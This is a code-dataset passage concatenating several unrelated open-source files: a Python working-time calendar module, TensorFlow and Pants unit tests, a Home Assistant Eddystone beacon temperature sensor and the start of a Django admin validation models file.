d_r = rebase(d_r, has_months, has_weeks or has_days, "m", d_p_m)
d_r = rebase(d_r, has_weeks, has_days, "w", d_p_w)
days, result = d_r
if not has_days:
minutes += days * d_w_h * 60
days = 0
if has_hours:
if not days:
result = re.sub("{[^{]*?%d[^}]*?}", "", result)
result = result.replace("%d", str(days))
else:
result = result.replace("%d",
"%.2f" % (days + float(minutes)
/ (d_w_h * 60)))
if has_hours:
if has_minutes:
val = minutes / 60
if not val:
result = re.sub("{[^{]*?%H[^}]*?}", "", result)
result = result.replace("%H", str(val))
minutes %= 60
else:
result = result.replace("%H", "%.2f" % (float(minutes) / 60))
if not minutes:
result = re.sub("{[^{]*?%M[^}]*?}", "", result)
result = result.replace("%M", str(minutes))
result = result.replace("{", "")
result = result.replace("}", "")
return result.strip()
#@-node:timedelta_to_str
#@+node:strftime
def strftime(dt, format):
"""
an extended version of strftime, that introduces some new
directives:
%IW iso week number
%IY iso year
%IB full month name appropriate to iso week
%ib abbreviated month name appropriate to iso week
%im month as decimal number appropriate to iso week
"""
iso = dt.isocalendar()
if iso[0] != dt.year:
iso_date = dt.replace(day=1, month=1)
format = format \
.replace("%IB", iso_date.strftime("%B"))\
.replace("%ib", iso_date.strftime("%b"))\
.replace("%im", iso_date.strftime("%m"))
else:
format = format \
.replace("%IB", "%B")\
.replace("%ib", "%b")\
.replace("%im", "%m")
format = format \
.replace("%IW", str(iso[1]))\
.replace("%IY", str(iso[0]))\
return dt.strftime(format)
#@-node:strftime
#@+node:union
def union(*calendars):
"""
returns a calendar that unifies all working times
"""
#@ << check arguments >>
#@+node:<< check arguments >>
if len(calendars) == 1:
calendars = calendars[0]
#@nonl
#@-node:<< check arguments >>
#@nl
#@ << intersect vacations >>
#@+node:<< intersect vacations >>
free_time = []
for c in calendars:
for start, end, is_free in c.time_spans:
if is_free:
free_time.append((start, False))
free_time.append((end, True))
count = len(calendars)
open = 0
time_spans = []
free_time.sort()
for date, is_end in free_time:
if is_end:
if open == count:
time_spans.append((start, date, True))
open -= 1
else:
open += 1
start = date
#@-node:<< intersect vacations >>
#@nl
#@ << unify extra worktime >>
#@+node:<< unify extra worktime >>
for c in calendars:
for start, end, is_free in c.time_spans:
if not is_free:
time_spans = _add_to_time_spans(time_spans, start, end)
#@nonl
#@-node:<< unify extra worktime >>
#@nl
#@ << unify working times >>
#@+node:<< unify working times >>
working_times = {}
for d in range(0, 7):
times = []
for c in calendars:
for start, end in c.working_times.get(d, []):
times.append((start, False))
times.append((end, True))
times.sort()
open = 0
ti = []
start = None
for time, is_end in times:
if not is_end:
if not start: start = time
open += 1
else:
open -= 1
if not open:
ti.append((start, time))
start = None
if ti:
working_times[d] = ti
#@-node:<< unify working times >>
#@nl
#@ << create result calendar >>
#@+node:<< create result calendar >>
result = Calendar()
result.working_times = working_times
result.time_spans = time_spans
result._recalc_working_time()
result._build_mapping()
#@nonl
#@-node:<< create result calendar >>
#@nl
return result
#@nonl
#@-node:union
#@+node:class _CalendarItem
class _CalendarItem(int):
#@ << class _CalendarItem declarations >>
#@+node:<< class _CalendarItem declarations >>
__slots__ = ()
calender = None
#@-node:<< class _CalendarItem declarations >>
#@nl
#@ @+others
#@+node:__new__
def __new__(cls, val):
try:
return int.__new__(cls, val)
except OverflowError:
return int.__new__(cls, sys.maxint)
#@-node:__new__
#@+node:round
def round(self, round_up=True):
m_t_u = self.calendar.minimum_time_unit
minutes = int(self)
base = (minutes / m_t_u) * m_t_u
minutes %= m_t_u
round_up = round_up and minutes > 0 or minutes > m_t_u / 2
if round_up: base += m_t_u
return self.__class__(base)
#@-node:round
#@-others
#@-node:class _CalendarItem
#@+node:class _Minutes
class _Minutes(_CalendarItem):
#@ << class _Minutes declarations >>
#@+node:<< class _Minutes declarations >>
__slots__ = ()
STR_FORMAT = "{%dd}{ %HH}{ %MM}"
#@-node:<< class _Minutes declarations >>
#@nl
#@ @+others
#@+node:__new__
def __new__(cls, src=0, is_duration=False):
"""
converts a timedelta in working minutes.
"""
if isinstance(src, cls) or type(src) is int:
return _CalendarItem.__new__(cls, src)
cal = cls.calendar
if not isinstance(src, datetime.timedelta):
src = to_timedelta(src, cal, is_duration)
d_w_h = is_duration and 24 or cal.working_hours_per_day
src = src.days * d_w_h * 60 + src.seconds / 60
return _CalendarItem.__new__(cls, src)
#@-node:__new__
#@+node:__cmp__
def __cmp__(self, other):
return cmp(int(self), int(self.__class__(other)))
#@-node:__cmp__
#@+node:__add__
def __add__(self, other):
try:
return self.__class__(int(self) + int(self.__class__(other)))
except:
return NotImplemented
#@-node:__add__
#@+node:__sub__
def __sub__(self, other):
try:
return self.__class__(int(self) - int(self.__class__(other)))
except:
return NotImplemented
#@-node:__sub__
#@+node:to_timedelta
def to_timedelta(self, is_duration=False):
d_w_h = is_duration and 24 or self.calendar.working_hours_per_day
minutes = int(self)
hours = minutes / 60
minutes = minutes % 60
days = hours / d_w_h
hours = hours % d_w_h
return datetime.timedelta(days, hours=hours, minutes=minutes)
#@nonl
#@-node:to_timedelta
#@+node:strftime
def strftime(self, format=None, is_duration=False):
td = self.to_timedelta(is_duration)
return timedelta_to_str(td, format or self.STR_FORMAT,
self.calendar, is_duration)
#@nonl
#@-node:strftime
#@-others
#@-node:class _Minutes
#@+node:class _WorkingDateBase
class _WorkingDateBase(_CalendarItem):
"""
A daytetime which has only valid values within the
workingtimes of a specific calendar
"""
#@ << class _WorkingDateBase declarations >>
#@+node:<< class _WorkingDateBase declarations >>
timetuple = True
STR_FORMAT = "%x %H:%M"
_minutes = _Minutes
__slots__ = ()
#@-node:<< class _WorkingDateBase declarations >>
#@nl
#@ @+others
#@+node:__new__
def __new__(cls, src):
#cls.__bases__[0] is the base of
#the calendar specific StartDate and EndDate
if isinstance(src, cls.__bases__[0]) or type(src) in (int, float):
return _CalendarItem.__new__(cls, src)
src = cls.calendar.from_datetime(to_datetime(src))
return _CalendarItem.__new__(cls, src)
#@-node:__new__
#@+node:__repr__
def __repr__(self):
return self.strftime()
#@-node:__repr__
#@+node:to_datetime
def to_datetime(self):
return self.to_starttime()
#@-node:to_datetime
#@+node:to_starttime
def to_starttime(self):
return self.calendar.to_starttime(self)
#@-node:to_starttime
#@+node:to_endtime
def to_endtime(self):
return self.calendar.to_endtime(self)
#@-node:to_endtime
#@+node:__cmp__
def __cmp__(self, other):
return cmp(int(self), int(self.__class__(other)))
#@-node:__cmp__
#@+node:__add__
def __add__(self, other):
try:
return self.__class__(int(self) + int(self._minutes(other)))
except ValueError, e:
raise e
except:
return NotImplemented
#@-node:__add__
#@+node:__sub__
def __sub__(self, other):
if isinstance(other, (datetime.timedelta, str, _Minutes)):
try:
other = self._minutes(other)
except:
pass
if isinstance(other, self._minutes):
return self.__class__(int(self) - int(other))
try:
return self._minutes(int(self) - int(self.__class__(other)))
except:
return NotImplemented
#@-node:__sub__
#@+node:strftime
def strftime(self, format=None):
return strftime(self.to_datetime(), format or self.STR_FORMAT)
#@-node:strftime
#@-others
#@-node:class _WorkingDateBase
#@+node:class Calendar
class Calendar(object):
"""
A calendar to specify working times and vacations.
The calendars epoch start at 1.1.1979
"""
#@ << declarations >>
#@+node:<< declarations >>
# january the first must be a monday
EPOCH = datetime.datetime(1979, 1, 1)
minimum_time_unit = DEFAULT_MINIMUM_TIME_UNIT
working_days_per_week = DEFAULT_WORKING_DAYS_PER_WEEK
working_days_per_month = DEFAULT_WORKING_DAYS_PER_MONTH
working_days_per_year = DEFAULT_WORKING_DAYS_PER_YEAR
working_hours_per_day = DEFAULT_WORKING_HOURS_PER_DAY
now = EPOCH
#@-node:<< declarations >>
#@nl
#@ @+others
#@+node:__init__
def __init__(self):
self.time_spans = ()
self._dt_num_can = ()
self._num_dt_can = ()
self.working_times = { }
self._recalc_working_time()
self._make_classes()
#@-node:__init__
#@+node:__or__
def __or__(self, other):
if isinstance(other, Calendar):
return union(self, other)
return NotImplemented
#@nonl
#@-node:__or__
#@+node:clone
def clone(self):
result = Calendar()
result.working_times = self.working_times.copy()
result.time_spans = self.time_spans
result._recalc_working_time()
result._build_mapping()
return result
#@nonl
#@-node:clone
#@+node:set_working_days
def set_working_days(self, day_range, trange, *further_tranges):
"""
Sets the working days of an calendar
day_range is a string of day abbreviations like 'mon, tue'
trange and further_tranges is a time range string like
'8:00-10:00'
"""
time_ranges = [ trange ] + list(further_tranges)
time_ranges = filter(bool, map(to_time_range, time_ranges))
days = _to_days(day_range)
for k in days.keys():
self.working_times[k] = time_ranges
self._recalc_working_time()
self._build_mapping()
#@-node:set_working_days
#@+node:set_vacation
def set_vacation(self, value):
"""
Sets vacation time.
value is either a datetime literal or
a sequence of items that can be
a datetime literals and or pair of datetime literals
"""
self.time_spans = _add_to_time_spans(self.time_spans, value, True)
self._build_mapping()
#@-node:set_vacation
#@+node:set_extra_work
def set_extra_work(self, value):
"""
Sets extra working time
value is either a datetime literal or
a sequence of items that can be
a datetime literals and or pair of datetime literals
"""
self.time_spans = _add_to_time_spans(self.time_spans, value, False)
self._build_mapping()
#@-node:set_extra_work
#@+node:from_datetime
def from_datetime(self, value):
assert(isinstance(value, datetime.datetime))
delta = value - self.EPOCH
days = delta.days
minutes = delta.seconds / 60
# calculate the weektime
weeks = days / 7
wtime = self.week_time * weeks
# calculate the daytime
days %= 7
dtime = sum(self.day_times[:days])
# calculate the minute time
slots = self.working_times.get(days, DEFAULT_WORKING_DAYS[days])
mtime = 0
for start, end in slots:
if minutes > end:
mtime += end - start
else:
if minutes > start:
mtime += minutes - start
break
result = wtime + dtime + mtime
# map exceptional timespans
dt_num_can = self._dt_num_can
pos = bisect.bisect(dt_num_can, (value,)) - 1
if pos >= 0:
start, end, nstart, nend, cend = dt_num_can[pos]
if value < end:
if nstart < nend:
delta = value - start
delta = delta.days * 24 * 60 + delta.seconds / 60
result = nstart + delta
else:
result = nstart
else:
result += (nend - cend) # == (result - cend) + nend
return result
#@-node:from_datetime
#@+node:split_time
def split_time(self, value):
#map exceptional timespans
num_dt_can = self._num_dt_can
pos = bisect.bisect(num_dt_can, (value, sys.maxint)) - 1
if pos >= 0:
nstart, nend, start, end, cend = num_dt_can[pos]
if value < nend:
value = start + datetime.timedelta(minutes=value - nstart)
delta = value - self.EPOCH
return delta.days / 7, delta.days % 7, delta.seconds / 60, -1
else:
value += (cend - nend) # (value - nend + cend)
#calculate the weeks since the epoch
weeks = value / self.week_time
value %= self.week_time
#calculate the remaining days
days = 0
for day_time in self.day_times:
if value < day_time: break
value -= day_time
days += 1
#calculate the remaining minutes
minutes = 0
slots = self.working_times.get(days, DEFAULT_WORKING_DAYS[days])
index = 0
for start, end in slots:
delta = end - start
if delta > value:
minutes = start + value
break
else:
value -= delta
index += 1
return weeks, days, minutes, index
#@-node:split_time
#@+node:to_starttime
def to_starttime(self, value):
weeks, days, minutes, index = self.split_time(value)
return self.EPOCH + datetime.timedelta(weeks=weeks,
days=days,
minutes=minutes)
#@-node:to_starttime
#@+node:to_endtime
def to_endtime(self, value):
return self.to_starttime(value - 1) + datetime.timedelta(minutes=1)
#@-node:to_endtime
#@+node:get_working_times
def get_working_times(self, day):
return self.working_times.get(day, DEFAULT_WORKING_DAYS[day])
#@-node:get_working_times
#@+node:_build_mapping
def _build_mapping(self):
self._dt_num_can = self._num_dt_can = ()
dt_num_can = []
num_dt_can = []
delta = self.Minutes()
for start, end, is_free in self.time_spans:
cstart = self.StartDate(start)
cend = self.EndDate(end)
nstart = cstart + delta
if not is_free:
d = end - start
d = d.days * 24 * 60 + d.seconds / 60
nend = nstart + d
else:
nend = nstart
delta += (nend - nstart) - (cend - cstart)
dt_num_can.append((start, end, nstart, nend, cend))
num_dt_can.append((nstart, nend, start, end, cend))
self._dt_num_can = tuple(dt_num_can)
self._num_dt_can = tuple(num_dt_can)
#@-node:_build_mapping
#@+node:_recalc_working_time
def _recalc_working_time(self):
def slot_sum_time(day):
slots = self.working_times.get(day, DEFAULT_WORKING_DAYS[day])
return sum(map(lambda slot: slot[1] - slot[0], slots))
self.day_times = map(slot_sum_time, range(0, 7))
self.week_time = sum(self.day_times)
#@-node:_recalc_working_time
#@+node:_make_classes
def _make_classes(self):
#ensure that the clases are instance specific
class minutes(_Minutes):
calendar = self
__slots__ = ()
class db(_WorkingDateBase):
calendar = self
_minutes = minutes
__slots__ = ()
class wdt(db): __slots__ = ()
class edt(db):
__slots__ = ()
def to_datetime(self):
return self.to_endtime()
self.Minutes, self.StartDate, self.EndDate = minutes, wdt, edt
self.WorkingDate = self.StartDate
#@-node:_make_classes
#@-others
_default_calendar = Calendar()
WorkingDate = _default_calendar.WorkingDate
StartDate = _default_calendar.StartDate
EndDate = _default_calendar.EndDate
Minutes = _default_calendar.Minutes
#@-node:class Calendar
#@-others
if __name__ == '__main__':
cal = Calendar()
start = EndDate("10.1.2005")
delay = Minutes("4H")
start2 = cal.StartDate(start)
start3 = cal.StartDate("10.1.2005")
#@-node:@file pcalendar.py
#@-leo
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
jart/tensorflow
|
tensorflow/python/kernel_tests/weights_broadcast_test.py
|
130
|
9711
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for broadcast rules."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import weights_broadcast_ops
from tensorflow.python.platform import test
def _test_values(shape):
return np.reshape(np.cumsum(np.ones(shape), dtype=np.int32), newshape=shape)
class AssertBroadcastableTest(test.TestCase):
def setUp(self):
ops.reset_default_graph()
def _test_valid(self, weights, values):
static_op = weights_broadcast_ops.assert_broadcastable(
weights=weights, values=values)
weights_placeholder = array_ops.placeholder(dtypes_lib.float32)
values_placeholder = array_ops.placeholder(dtypes_lib.float32)
dynamic_op = weights_broadcast_ops.assert_broadcastable(
weights=weights_placeholder, values=values_placeholder)
with self.test_session():
static_op.run()
dynamic_op.run(feed_dict={
weights_placeholder: weights,
values_placeholder: values,
})
def testScalar(self):
self._test_valid(weights=5, values=_test_values((3, 2, 4)))
def test1x1x1(self):
self._test_valid(
weights=np.asarray((5,)).reshape((1, 1, 1)),
values=_test_values((3, 2, 4)))
def test1x1xN(self):
self._test_valid(
weights=np.asarray((5, 7, 11, 3)).reshape((1, 1, 4)),
values=_test_values((3, 2, 4)))
def test1xNx1(self):
self._test_valid(
weights=np.asarray((5, 11)).reshape((1, 2, 1)),
values=_test_values((3, 2, 4)))
def test1xNxN(self):
self._test_valid(
weights=np.asarray((5, 7, 11, 3, 2, 13, 7, 5)).reshape((1, 2, 4)),
values=_test_values((3, 2, 4)))
def testNx1x1(self):
self._test_valid(
weights=np.asarray((5, 7, 11)).reshape((3, 1, 1)),
values=_test_values((3, 2, 4)))
def testNx1xN(self):
self._test_valid(
weights=np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3)).reshape((3, 1, 4)),
values=_test_values((3, 2, 4)))
def testNxNxN(self):
self._test_valid(
weights=np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3,
2, 17, 11, 3, 5, 7, 11, 3, 2, 12, 7, 5)).reshape((3, 2, 4)),
values=_test_values((3, 2, 4)))
def _test_invalid(self, weights, values):
error_msg = 'weights can not be broadcast to values'
with self.assertRaisesRegexp(ValueError, error_msg):
weights_broadcast_ops.assert_broadcastable(weights=weights, values=values)
weights_placeholder = array_ops.placeholder(dtypes_lib.float32)
values_placeholder = array_ops.placeholder(dtypes_lib.float32)
dynamic_op = weights_broadcast_ops.assert_broadcastable(
weights=weights_placeholder, values=values_placeholder)
with self.test_session():
with self.assertRaisesRegexp(errors_impl.OpError, error_msg):
dynamic_op.run(feed_dict={
weights_placeholder: weights,
values_placeholder: values,
})
def testInvalid1(self):
self._test_invalid(weights=np.asarray((5,)), values=_test_values((3, 2, 4)))
def testInvalid1x1(self):
self._test_invalid(
weights=np.asarray((5,)).reshape((1, 1)),
values=_test_values((3, 2, 4)))
def testInvalidPrefixMatch(self):
self._test_invalid(
weights=np.asarray((5, 7, 11, 3, 2, 12)).reshape((3, 2)),
values=_test_values((3, 2, 4)))
def testInvalidSuffixMatch(self):
self._test_invalid(
weights=np.asarray((5, 7, 11, 3, 2, 12, 7, 5)).reshape((2, 4)),
values=_test_values((3, 2, 4)))
def testInvalidOnesExtraDim(self):
self._test_invalid(
weights=np.asarray((5,)).reshape((1, 1, 1, 1)),
values=_test_values((3, 2, 4)))
def testInvalidPrefixMatchExtraDim(self):
self._test_invalid(
weights=np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3,
2, 17, 11, 3, 5, 7, 11, 3, 2, 12, 7, 5)).reshape((3, 2, 4, 1)),
values=_test_values((3, 2, 4)))
def testInvalidSuffixMatchExtraDim(self):
self._test_invalid(
weights=np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3,
2, 17, 11, 3, 5, 7, 11, 3, 2, 12, 7, 5)).reshape((1, 3, 2, 4)),
values=_test_values((3, 2, 4)))
class BroadcastWeightsTest(test.TestCase):
def setUp(self):
ops.reset_default_graph()
def _test_valid(self, weights, values, expected):
static_op = weights_broadcast_ops.broadcast_weights(
weights=weights, values=values)
weights_placeholder = array_ops.placeholder(dtypes_lib.float32)
values_placeholder = array_ops.placeholder(dtypes_lib.float32)
dynamic_op = weights_broadcast_ops.broadcast_weights(
weights=weights_placeholder, values=values_placeholder)
with self.test_session():
self.assertAllEqual(expected, static_op.eval())
self.assertAllEqual(expected, dynamic_op.eval(feed_dict={
weights_placeholder: weights,
values_placeholder: values,
}))
def testScalar(self):
self._test_valid(
weights=5,
values=_test_values((3, 2, 4)),
expected=5 * np.ones((3, 2, 4)))
def test1x1x1(self):
self._test_valid(
weights=np.asarray((5,)).reshape((1, 1, 1)),
values=_test_values((3, 2, 4)),
expected=5 * np.ones((3, 2, 4)))
def test1x1xN(self):
weights = np.asarray((5, 7, 11, 3)).reshape((1, 1, 4))
self._test_valid(
weights=weights,
values=_test_values((3, 2, 4)),
expected=np.tile(weights, reps=(3, 2, 1)))
def test1xNx1(self):
weights = np.asarray((5, 11)).reshape((1, 2, 1))
self._test_valid(
weights=weights,
values=_test_values((3, 2, 4)),
expected=np.tile(weights, reps=(3, 1, 4)))
def test1xNxN(self):
weights = np.asarray((5, 7, 11, 3, 2, 13, 7, 5)).reshape((1, 2, 4))
self._test_valid(
weights=weights,
values=_test_values((3, 2, 4)),
expected=np.tile(weights, reps=(3, 1, 1)))
def testNx1x1(self):
weights = np.asarray((5, 7, 11)).reshape((3, 1, 1))
self._test_valid(
weights=weights,
values=_test_values((3, 2, 4)),
expected=np.tile(weights, reps=(1, 2, 4)))
def testNx1xN(self):
weights = np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3)).reshape((3, 1, 4))
self._test_valid(
weights=weights,
values=_test_values((3, 2, 4)),
expected=np.tile(weights, reps=(1, 2, 1)))
def testNxNxN(self):
weights = np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3,
2, 17, 11, 3, 5, 7, 11, 3, 2, 12, 7, 5)).reshape((3, 2, 4))
self._test_valid(
weights=weights, values=_test_values((3, 2, 4)), expected=weights)
def _test_invalid(self, weights, values):
error_msg = 'weights can not be broadcast to values'
with self.assertRaisesRegexp(ValueError, error_msg):
weights_broadcast_ops.broadcast_weights(weights=weights, values=values)
weights_placeholder = array_ops.placeholder(dtypes_lib.float32)
values_placeholder = array_ops.placeholder(dtypes_lib.float32)
dynamic_op = weights_broadcast_ops.broadcast_weights(
weights=weights_placeholder, values=values_placeholder)
with self.test_session():
with self.assertRaisesRegexp(errors_impl.OpError, error_msg):
dynamic_op.eval(feed_dict={
weights_placeholder: weights,
values_placeholder: values,
})
def testInvalid1(self):
self._test_invalid(weights=np.asarray((5,)), values=_test_values((3, 2, 4)))
def testInvalid1x1(self):
self._test_invalid(
weights=np.asarray((5,)).reshape((1, 1)),
values=_test_values((3, 2, 4)))
def testInvalidPrefixMatch(self):
self._test_invalid(
weights=np.asarray((5, 7, 11, 3, 2, 12)).reshape((3, 2)),
values=_test_values((3, 2, 4)))
def testInvalidSuffixMatch(self):
self._test_invalid(
weights=np.asarray((5, 7, 11, 3, 2, 12, 7, 5)).reshape((2, 4)),
values=_test_values((3, 2, 4)))
def testInvalidOnesExtraDim(self):
self._test_invalid(
weights=np.asarray((5,)).reshape((1, 1, 1, 1)),
values=_test_values((3, 2, 4)))
def testInvalidPrefixMatchExtraDim(self):
self._test_invalid(
weights=np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3,
2, 17, 11, 3, 5, 7, 11, 3, 2, 12, 7, 5)).reshape((3, 2, 4, 1)),
values=_test_values((3, 2, 4)))
def testInvalidSuffixMatchExtraDim(self):
self._test_invalid(
weights=np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3,
2, 17, 11, 3, 5, 7, 11, 3, 2, 12, 7, 5)).reshape((1, 3, 2, 4)),
values=_test_values((3, 2, 4)))
if __name__ == '__main__':
test.main()
|
apache-2.0
|
slyphon/pants
|
tests/python/pants_test/backend/core/tasks/test_paths.py
|
6
|
5072
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.backend.core.tasks.paths import Path, Paths
from pants.base.exceptions import TaskError
from pants_test.tasks.task_test_base import ConsoleTaskTestBase
class PathsTest(ConsoleTaskTestBase):
@classmethod
def task_type(cls):
return Paths
def test_only_one_target(self):
target_a = self.make_target('a')
with self.assertRaises(TaskError) as cm:
self.execute_console_task(targets=[target_a])
self.assertIn('Specify two targets please', str(cm.exception))
self.assertIn('found 1', str(cm.exception))
def test_three_targets(self):
target_a = self.make_target('a')
target_b = self.make_target('b')
target_c = self.make_target('c')
with self.assertRaises(TaskError) as cm:
self.execute_console_task(targets=[target_a, target_b, target_c])
self.assertIn('Specify two targets please', str(cm.exception))
self.assertIn('found 3', str(cm.exception))
def test_path_dependency_first_finds_no_paths(self):
# Not sure if I like this behavior, but adding to document it
target_b = self.make_target('b')
target_a = self.make_target('a', dependencies=[target_b])
self.assert_console_output('Found 0 paths', targets=[target_b, target_a])
def test_single_edge_path(self):
target_b = self.make_target('b')
target_a = self.make_target('a', dependencies=[target_b])
self.assert_console_output('Found 1 path',
'',
'\t[a, b]',
targets=[target_a, target_b])
def test_same_target_path(self):
target_b = self.make_target('b')
self.assert_console_output('Found 1 path',
'',
'\t[b]',
targets=[target_b, target_b])
def test_two_paths(self):
target_b = self.make_target('b')
target_inner_1 = self.make_target('inner1', dependencies=[target_b])
target_inner_2 = self.make_target('inner2', dependencies=[target_b])
target_a = self.make_target('a', dependencies=[target_inner_1, target_inner_2])
self.assert_console_output('Found 2 paths',
'',
'\t[a, inner1, b]',
'\t[a, inner2, b]',
targets=[target_a, target_b])
def test_cycle_no_path(self):
target_b = self.make_target('b')
target_inner_1 = self.make_target('inner1')
target_inner_2 = self.make_target('inner2', dependencies=[target_inner_1])
target_a = self.make_target('a', dependencies=[target_inner_1])
target_inner_1.inject_dependency(target_inner_2.address)
self.assert_console_output('Found 0 paths',
targets=[target_a, target_b])
def test_cycle_path(self):
target_b = self.make_target('b')
target_inner_1 = self.make_target('inner1', dependencies=[target_b])
target_inner_2 = self.make_target('inner2', dependencies=[target_inner_1, target_b])
target_inner_1.inject_dependency(target_inner_2.address)
target_a = self.make_target('a', dependencies=[target_inner_1])
self.assert_console_output('Found 3 paths',
'',
'\t[a, inner1, b]',
'\t[a, inner1, inner2, b]',
'\t[a, inner1, inner2, inner1, b]',
targets=[target_a, target_b])
def test_overlapping_paths(self):
target_b = self.make_target('b')
target_inner_1 = self.make_target('inner1', dependencies=[target_b])
target_inner_2 = self.make_target('inner2', dependencies=[target_inner_1])
target_a = self.make_target('a', dependencies=[target_inner_1, target_inner_2])
self.assert_console_output('Found 2 paths',
'',
'\t[a, inner1, b]',
'\t[a, inner2, inner1, b]',
targets=[target_a, target_b])
class PathTest(ConsoleTaskTestBase):
@classmethod
def task_type(cls):
return Path
def test_only_returns_first_path(self):
target_b = self.make_target('b')
target_inner_1 = self.make_target('inner1', dependencies=[target_b])
target_inner_2 = self.make_target('inner2', dependencies=[target_inner_1])
target_a = self.make_target('a', dependencies=[target_inner_1, target_inner_2])
self.assert_console_output('[a, inner1, b]',
targets=[target_a, target_b])
def test_when_no_path(self):
target_b = self.make_target('b')
target_a = self.make_target('a')
self.assert_console_output('No path found from a to b!',
targets=[target_a, target_b])
|
apache-2.0
|
GenericStudent/home-assistant
|
homeassistant/components/eddystone_temperature/sensor.py
|
16
|
5640
|
"""
Read temperature information from Eddystone beacons.
Your beacons must be configured to transmit UID (for identification) and TLM
(for temperature) frames.
"""
import logging
# pylint: disable=import-error
from beacontools import BeaconScanner, EddystoneFilter, EddystoneTLMFrame
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_NAME,
EVENT_HOMEASSISTANT_START,
EVENT_HOMEASSISTANT_STOP,
STATE_UNKNOWN,
TEMP_CELSIUS,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
CONF_BEACONS = "beacons"
CONF_BT_DEVICE_ID = "bt_device_id"
CONF_INSTANCE = "instance"
CONF_NAMESPACE = "namespace"
BEACON_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAMESPACE): cv.string,
vol.Required(CONF_INSTANCE): cv.string,
vol.Optional(CONF_NAME): cv.string,
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_BT_DEVICE_ID, default=0): cv.positive_int,
vol.Required(CONF_BEACONS): vol.Schema({cv.string: BEACON_SCHEMA}),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Validate configuration, create devices and start monitoring thread."""
bt_device_id = config.get("bt_device_id")
beacons = config.get(CONF_BEACONS)
devices = []
for dev_name, properties in beacons.items():
namespace = get_from_conf(properties, CONF_NAMESPACE, 20)
instance = get_from_conf(properties, CONF_INSTANCE, 12)
name = properties.get(CONF_NAME, dev_name)
if instance is None or namespace is None:
_LOGGER.error("Skipping %s", dev_name)
continue
devices.append(EddystoneTemp(name, namespace, instance))
if devices:
mon = Monitor(hass, devices, bt_device_id)
def monitor_stop(_service_or_event):
"""Stop the monitor thread."""
_LOGGER.info("Stopping scanner for Eddystone beacons")
mon.stop()
def monitor_start(_service_or_event):
"""Start the monitor thread."""
_LOGGER.info("Starting scanner for Eddystone beacons")
mon.start()
add_entities(devices)
mon.start()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, monitor_stop)
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, monitor_start)
else:
_LOGGER.warning("No devices were added")
def get_from_conf(config, config_key, length):
"""Retrieve value from config and validate length."""
string = config.get(config_key)
if len(string) != length:
_LOGGER.error(
"Error in configuration parameter %s: Must be exactly %d "
"bytes. Device will not be added",
config_key,
length / 2,
)
return None
return string
class EddystoneTemp(Entity):
"""Representation of a temperature sensor."""
def __init__(self, name, namespace, instance):
"""Initialize a sensor."""
self._name = name
self.namespace = namespace
self.instance = instance
self.bt_addr = None
self.temperature = STATE_UNKNOWN
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self.temperature
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
return TEMP_CELSIUS
@property
def should_poll(self):
"""Return the polling state."""
return False
class Monitor:
"""Continuously scan for BLE advertisements."""
def __init__(self, hass, devices, bt_device_id):
"""Construct interface object."""
self.hass = hass
# List of beacons to monitor
self.devices = devices
# Number of the bt device (hciX)
self.bt_device_id = bt_device_id
def callback(bt_addr, _, packet, additional_info):
"""Handle new packets."""
self.process_packet(
additional_info["namespace"],
additional_info["instance"],
packet.temperature,
)
device_filters = [EddystoneFilter(d.namespace, d.instance) for d in devices]
self.scanner = BeaconScanner(
callback, bt_device_id, device_filters, EddystoneTLMFrame
)
self.scanning = False
def start(self):
"""Continuously scan for BLE advertisements."""
if not self.scanning:
self.scanner.start()
self.scanning = True
else:
_LOGGER.debug("start() called, but scanner is already running")
def process_packet(self, namespace, instance, temperature):
"""Assign temperature to device."""
_LOGGER.debug(
"Received temperature for <%s,%s>: %d", namespace, instance, temperature
)
for dev in self.devices:
if dev.namespace == namespace and dev.instance == instance:
if dev.temperature != temperature:
dev.temperature = temperature
dev.schedule_update_ha_state()
def stop(self):
"""Signal runner to stop and join thread."""
if self.scanning:
_LOGGER.debug("Stopping...")
self.scanner.stop()
_LOGGER.debug("Stopped")
self.scanning = False
else:
_LOGGER.debug("stop() called but scanner was not running")
|
apache-2.0
|
alexmandujano/django
|
tests/admin_validation/models.py
|
192
|
1332
|
"""
Tests of ModelAdmin validation logic.
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
class Album(models.Model):
title = models.CharField(max_length=150)
@python_2_unicode_compatible
class Song(models.Model):
title = models.CharField(max_length=150)
